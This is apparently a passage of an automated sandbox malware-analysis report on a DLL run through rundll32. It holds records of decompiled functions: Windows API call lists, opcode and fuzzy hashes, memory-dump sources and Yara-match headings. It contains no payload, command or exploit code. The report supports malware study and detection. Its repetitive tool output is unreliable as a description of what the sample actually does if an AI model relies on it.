                                                                                                                          • API String ID: 356813703-0
                                                                                                                          • Opcode ID: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                          • Instruction ID: 3e12b38782b34356c97e10a87625d487b7a933956f885299f771b8ffc362d3ba
                                                                                                                          • Opcode Fuzzy Hash: 83477c0e15d1c33d1bb5ec65c1815380ae7d3f4553bdd0be20f92f622c24e4f3
                                                                                                                          • Instruction Fuzzy Hash: 7B117974100305AFE721EF60CD86D2ABBA6EF44314B51C029F8569A622DB30FC60CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$Brush
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2798902688-0
                                                                                                                          • Opcode ID: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                          • Instruction ID: b96cbce945517a62156269669ca61c0ebe7744eb3e98ebe12a1aee9bfd1db884
                                                                                                                          • Opcode Fuzzy Hash: 72252987b8d251bab477bb0d0c872f96bc616149d35122bfb9b146a10746700a
                                                                                                                          • Instruction Fuzzy Hash: 65F012719407449BD730BF728D49B47BAD5FFC4710F02092EE2418B990E6B6E040DF44
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 10029837
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 1002989C
                                                                                                                            • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 10029AAB
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 10029B1D
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 10029D0E
                                                                                                                            • Part of subcall function 1002BDB9: VariantCopy.OLEAUT32(?,?), ref: 1002BDC7
                                                                                                                            • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                            • Part of subcall function 1002C06F: __EH_prolog3.LIBCMT ref: 1002C079
                                                                                                                            • Part of subcall function 1002C06F: lstrlenA.KERNEL32(?,00000224,10029CDA,?,00000008,00000000,?,000000CC), ref: 1002C098
                                                                                                                            • Part of subcall function 1002C06F: SysAllocStringByteLen.OLEAUT32(?,00000000), ref: 1002C0A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Variant$Clear$H_prolog3$AllocAllocatorByteCopyDebugException@8HeapStringThrowlstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 63617653-0
                                                                                                                          • Opcode ID: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
                                                                                                                          • Instruction ID: 8f7f5911e4d3fd52506e0ebb541b856e7b36a578254e0be009e80c36fe1d785e
                                                                                                                          • Opcode Fuzzy Hash: 5e2e0a19dc0039e2f502762359befe2295f094a54db6864ce8f61926c363e3fd
                                                                                                                          • Instruction Fuzzy Hash: 13F16D7890024CEBDF55DFA0E890AFD7BB9EF08384F90405AFC5593191DB74AA88DB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 1002D1F0
                                                                                                                          • lstrlenA.KERNEL32(00000000,000000FF,00000050,10022221,00000000,00000001,?,?,000000FF,?,?,?), ref: 1002D222
                                                                                                                            • Part of subcall function 10017790: _memcpy_s.LIBCMT ref: 100177A0
                                                                                                                          • _memset.LIBCMT ref: 1002D2F2
                                                                                                                          • VariantClear.OLEAUT32(?), ref: 1002D3D1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ClearH_prolog3_catch_Variant_memcpy_s_memsetlstrlen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4021759052-0
                                                                                                                          • Opcode ID: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                          • Instruction ID: 5c01f4bcc98ccee0a604cdfa5feeb0fdece88e80b40f5b50a3c571396f452454
                                                                                                                          • Opcode Fuzzy Hash: dc537336900b1f9e5654c723f7bc7d689170c1efb2efdbad80408bb984cec35a
                                                                                                                          • Instruction Fuzzy Hash: 50A18C35C04249DBCF11EFA4E985AEEBBF0FF04350FA0415AE914AB291D734AE41DB61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • _memset.LIBCMT ref: 1002D5FF
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 1002D650
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 1002D674
                                                                                                                            • Part of subcall function 100200B9: __EH_prolog3.LIBCMT ref: 100200C0
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 1002D6CC
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 1002D6F5
                                                                                                                          • SysAllocString.OLEAUT32(00000000), ref: 1002D724
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocString$H_prolog3_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 842698744-0
                                                                                                                          • Opcode ID: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                          • Instruction ID: 4ca028c9b4d427f08f2d669533113988f62624cee2fc7606aac8abf48e723189
                                                                                                                          • Opcode Fuzzy Hash: 508acb920ccba7a207f47e88a798d4189b9ed575a01c86aa1581d938c190cd50
                                                                                                                          • Instruction Fuzzy Hash: E9414A34900304CFDB24EFB8D891AADB7B5EF04314F50852EF9659B2A2DB74A854CF55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 10016936: GetParent.USER32(100010EC), ref: 10016989
                                                                                                                            • Part of subcall function 10016936: GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                            • Part of subcall function 10016936: IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                            • Part of subcall function 10016936: EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 10016A2E
                                                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 10016A3C
                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 10016A46
                                                                                                                          • SendMessageA.USER32 ref: 10016A5B
                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 10016AD8
                                                                                                                          • EnableWindow.USER32(?,00000001), ref: 10016B14
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1877664794-0
                                                                                                                          • Opcode ID: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
                                                                                                                          • Instruction ID: f13ef48dc5fb0c484cec2fa7b3f992f2dc6d3b1b42596072abe369902371925a
                                                                                                                          • Opcode Fuzzy Hash: f56e269d1f7720d56fa1c58fd8a6d78852bfdb5100da494152acd8aedeab4fb9
                                                                                                                          • Instruction Fuzzy Hash: 3B415B72A00258DBEB20CFA4CC81BDD76A8EF09350F614119E949AB281E770D9848F52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetWindowLongA.USER32(100010EC,000000F0), ref: 10016968
                                                                                                                          • GetParent.USER32(100010EC), ref: 10016976
                                                                                                                          • GetParent.USER32(100010EC), ref: 10016989
                                                                                                                          • GetLastActivePopup.USER32(100010EC), ref: 10016998
                                                                                                                          • IsWindowEnabled.USER32(100010EC), ref: 100169AD
                                                                                                                          • EnableWindow.USER32(100010EC,00000000), ref: 100169C0
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 670545878-0
                                                                                                                          • Opcode ID: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                          • Instruction ID: 154aafdfd528b469a8bf80fc48512ff59873e22bfc4d6b8fcadc8b05587993e6
                                                                                                                          • Opcode Fuzzy Hash: 0556ac702c88567a1be081abf13cc9cce852e4592f4cca89957eeb32636ff491
                                                                                                                          • Instruction Fuzzy Hash: D111A57260133697D661DB698E80B1BB6ECDF9EAE1F120115ED00EF254EB70DC808696
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • ClientToScreen.USER32(?,?), ref: 10020568
                                                                                                                          • GetDlgCtrlID.USER32 ref: 1002057C
                                                                                                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 1002058A
                                                                                                                          • GetWindowRect.USER32 ref: 1002059C
                                                                                                                          • PtInRect.USER32(?,?,?), ref: 100205AC
                                                                                                                          • GetWindow.USER32(?,00000005), ref: 100205B9
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1315500227-0
                                                                                                                          • Opcode ID: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                          • Instruction ID: 9197e044a219b4c4c22350dcb983fe24fb7029e94376554506d026f7e511957d
                                                                                                                          • Opcode Fuzzy Hash: 6e799736a4181f77db8ba904b29fc337daefc7dc264e49bf5415e2b3170b0d90
                                                                                                                          • Instruction Fuzzy Hash: 3B01A235501739EBEB11DF549C48E9F3BADEF4A791F404011FD10D2061E730DA018B99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: _memset
                                                                                                                          • String ID: @$@$AfxFrameOrView80s$AfxMDIFrame80s
                                                                                                                          • API String ID: 2102423945-4122032997
                                                                                                                          • Opcode ID: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                          • Instruction ID: bbe41a20c7329c8f9bdc0efe2c46215e461a01fcfe5e7bc54fed728f21783543
                                                                                                                          • Opcode Fuzzy Hash: 34855274ca0ecd676c0cb297c8efdd531dfb4bca4f276cdc03237f3f296c8161
                                                                                                                          • Instruction Fuzzy Hash: B0816076D04219AADB40EFA4D481BDEBBF8EF04384F518566F909EB181E774DAC4CB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GlobalLock.KERNEL32 ref: 10021DB2
                                                                                                                          • lstrlenA.KERNEL32(?), ref: 10021DFA
                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 10021E14
                                                                                                                          Strings
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: ByteCharGlobalLockMultiWidelstrlen
                                                                                                                          • String ID: System
                                                                                                                          • API String ID: 1529587224-3470857405
                                                                                                                          • Opcode ID: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
                                                                                                                          • Instruction ID: 0e81d0f59cd66082c3aa20aff96d3ec22f48ed16ea157d431ad3d5bc96dc32b7
                                                                                                                          • Opcode Fuzzy Hash: 33974d9c05b04c687ac20437ddad08aa00536e5ed05beed44e1f4e08908d61b5
                                                                                                                          • Instruction Fuzzy Hash: B441C275900215DFDF14CFA4DD85AEEBBB5EF14310F51822AE802DB285EB70A946CB50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 100233CB
                                                                                                                          • GetModuleHandleA.KERNEL32(?,1004B63C,00000000,?), ref: 10023496
                                                                                                                          • GetProcAddress.KERNEL32(00000000,MFCM80ReleaseManagedReferences), ref: 100234A6
                                                                                                                          Strings
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressH_prolog3_HandleModuleProc
                                                                                                                          • String ID: MFCM80ReleaseManagedReferences$mfcm80.dll
                                                                                                                          • API String ID: 2418878492-2500072749
                                                                                                                          • Opcode ID: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                          • Instruction ID: 416d3485c59068a364c2a46f33bf17d30033b20eabc5154db7a9307924c289c3
                                                                                                                          • Opcode Fuzzy Hash: b0e0a0a37f3552f3ecb8dafd0a082c9c0df66c75591a9635effa9e0eee7a218d
                                                                                                                          • Instruction Fuzzy Hash: 45318F74A006449FCF06EFA0D8957AD77F9EF48300F914098E905EB292DB78EE04CB55
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetMenuCheckMarkDimensions.USER32 ref: 1001573B
                                                                                                                          • _memset.LIBCMT ref: 1001579D
                                                                                                                          • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 100157EF
                                                                                                                          • LoadBitmapA.USER32 ref: 10015807
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu_memset
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4271682439-3916222277
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_GS.LIBCMT ref: 10023B2B
                                                                                                                          • GetObjectA.GDI32(100188B8,0000003C,?), ref: 10023B7D
                                                                                                                          • GetDeviceCaps.GDI32(?,0000005A), ref: 10023BED
                                                                                                                          • OleCreateFontIndirect.OLEAUT32(00000020,1004B6CC), ref: 10023C19
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsCreateDeviceFontH_prolog3_IndirectObject
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2429671754-3916222277
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 10018D43
                                                                                                                          • GetSystemMetrics.USER32 ref: 10018D5B
                                                                                                                          • GetSystemMetrics.USER32 ref: 10018D62
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: System$Metrics$InfoParameters
                                                                                                                          • String ID: B$DISPLAY
                                                                                                                          • API String ID: 3136151823-3316187204
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Edit
                                                                                                                          • API String ID: 0-554135844
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 10023C61
                                                                                                                          • SendMessageA.USER32 ref: 10023CD9
                                                                                                                          • GetBkColor.GDI32(?), ref: 10023CE2
                                                                                                                          • GetTextColor.GDI32(?), ref: 10023CEE
                                                                                                                          • GetThreadLocale.KERNEL32(0000F1C0,00000000,?,?,00000014), ref: 10023D80
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Color$H_prolog3LocaleMessageSendTextThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 187318432-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 10016480
                                                                                                                          • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 1001649F
                                                                                                                          • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 100164BD
                                                                                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 10016538
                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 10016543
                                                                                                                            • Part of subcall function 10013820: _DebugHeapAllocator.LIBCPMTD ref: 10013875
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocatorCloseDebugDeleteEnumH_prolog3_catchHeapOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 69039007-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetMapMode.GDI32(?), ref: 1002B3B9
                                                                                                                          • GetDeviceCaps.GDI32(?,00000058), ref: 1002B3F3
                                                                                                                          • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B3FC
                                                                                                                            • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001ED8C
                                                                                                                            • Part of subcall function 1001ED4C: MulDiv.KERNEL32 ref: 1001EDA9
                                                                                                                          • MulDiv.KERNEL32 ref: 1002B420
                                                                                                                          • MulDiv.KERNEL32 ref: 1002B42B
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsDevice$Mode
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 696222070-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • GetMapMode.GDI32(?), ref: 1002B447
                                                                                                                          • GetDeviceCaps.GDI32(?,00000058), ref: 1002B481
                                                                                                                          • GetDeviceCaps.GDI32(?,0000005A), ref: 1002B48A
                                                                                                                            • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED23
                                                                                                                            • Part of subcall function 1001ECE3: MulDiv.KERNEL32 ref: 1001ED40
                                                                                                                          • MulDiv.KERNEL32 ref: 1002B4AE
                                                                                                                          • MulDiv.KERNEL32 ref: 1002B4B9
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447481596.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447493581.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447511592.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CapsDevice$Mode
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 696222070-0
                                                                                                                          • Opcode ID: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                          • Instruction ID: 3f65263faca37ec2066e18a28c5c11a55be6ae6448755079bbf75ecdaa8dd8b2
                                                                                                                          • Opcode Fuzzy Hash: 6f199a3495fbdd21d567dc82426adb66683fca9deaa291746216ef97ded9c58c
                                                                                                                          • Instruction Fuzzy Hash: 2511CE75600A14EFDB21AF55CC84C1EBBEAEF89750B118819FA8597361DB31EC01DB90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(?), ref: 10020407
                                                                                                                          • _memset.LIBCMT ref: 10020424
                                                                                                                          • GetWindowTextA.USER32(?,00000000,00000100), ref: 1002043E
                                                                                                                          • lstrcmpA.KERNEL32(00000000,?), ref: 10020450
                                                                                                                          • SetWindowTextA.USER32(?,?), ref: 1002045C
                                                                                                                            • Part of subcall function 100201F1: __CxxThrowException@8.LIBCMT ref: 10020205
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447233462.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447223606.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                          • Associated: 00000009.00000002.447370170.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
